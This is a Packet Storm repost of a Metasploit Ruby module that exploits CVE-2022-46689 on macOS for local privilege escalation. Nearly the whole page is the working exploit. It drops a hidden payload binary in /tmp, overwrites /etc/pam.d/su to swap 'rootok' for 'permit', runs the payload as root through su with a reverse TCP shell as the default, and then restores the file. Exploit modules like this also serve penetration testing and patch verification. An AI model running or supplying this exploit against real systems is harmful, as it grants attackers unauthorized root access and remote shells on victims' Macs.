what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation
Posted Feb 3, 2023
Authored by timwr, Ian Beer, Zhuowei Zhang | Site metasploit.com

Dirty Cow arbitrary file write local privilege escalation exploit for macOS.

tags | exploit, arbitrary, local
advisories | CVE-2022-46689
SHA-256 | 2c735a5dbdfd48004da2df38d8a8eed0528ab5199ff9cd6dbf70e890c7786c0c

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Post::OSX::Priv
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation',
'Description' => %q{
An app may be able to execute arbitrary code with kernel privileges
},
'License' => MSF_LICENSE,
'Author' => [
'Ian Beer', # discovery
'Zhuowei Zhang', # proof of concept
'timwr' # metasploit integration
],
'References' => [
['CVE', '2022-46689'],
['URL', 'https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c'],
['URL', 'https://github.com/zhuowei/MacDirtyCowDemo'],
],
'Platform' => 'osx',
'Arch' => ARCH_X64,
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' },
'Targets' => [
[ 'Mac OS X x64 (Native Payload)', {} ],
],
'DisclosureDate' => '2022-12-17',
'Notes' => {
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
'Reliability' => [REPEATABLE_SESSION],
'Stability' => [CRASH_SAFE]
}
)
)
register_advanced_options [
OptString.new('TargetFile', [ true, 'The pam.d file to overwrite', '/etc/pam.d/su' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end

def check
version = Rex::Version.new(get_system_version)
if version > Rex::Version.new('13.0.1')
CheckCode::Safe
elsif version < Rex::Version.new('13.0') && version > Rex::Version.new('12.6.1')
CheckCode::Safe
elsif version < Rex::Version.new('10.15')
CheckCode::Safe
else
CheckCode::Appears
end
end

def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end

unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end

payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
upload_and_chmodx payload_file, binary_payload
register_file_for_cleanup payload_file

target_file = datastore['TargetFile']
current_content = read_file(target_file)
backup_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
unless write_file(backup_file, current_content)
fail_with Failure::BadConfig, "#{backup_file} is not writable"
end
register_file_for_cleanup backup_file

replace_content = current_content.sub('rootok', 'permit')

replace_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
unless write_file(replace_file, replace_content)
fail_with Failure::BadConfig, "#{replace_file} is not writable"
end
register_file_for_cleanup replace_file

exploit_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
exploit_exe = exploit_data 'CVE-2022-46689', 'exploit'
upload_and_chmodx exploit_file, exploit_exe
register_file_for_cleanup exploit_file

exploit_cmd = "#{exploit_file} #{target_file} #{replace_file}"
print_status("Executing exploit '#{exploit_cmd}'")
result = cmd_exec(exploit_cmd)
print_status("Exploit result:\n#{result}")

su_cmd = "echo '#{payload_file} & disown' | su"
print_status("Running cmd:\n#{su_cmd}")
result = cmd_exec(su_cmd)
unless result.blank?
print_status("Command output:\n#{result}")
end

exploit_cmd = "#{exploit_file} #{target_file} #{backup_file}"
print_status("Executing exploit (restoring) '#{exploit_cmd}'")
result = cmd_exec(exploit_cmd)
print_status("Exploit result:\n#{result}")
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close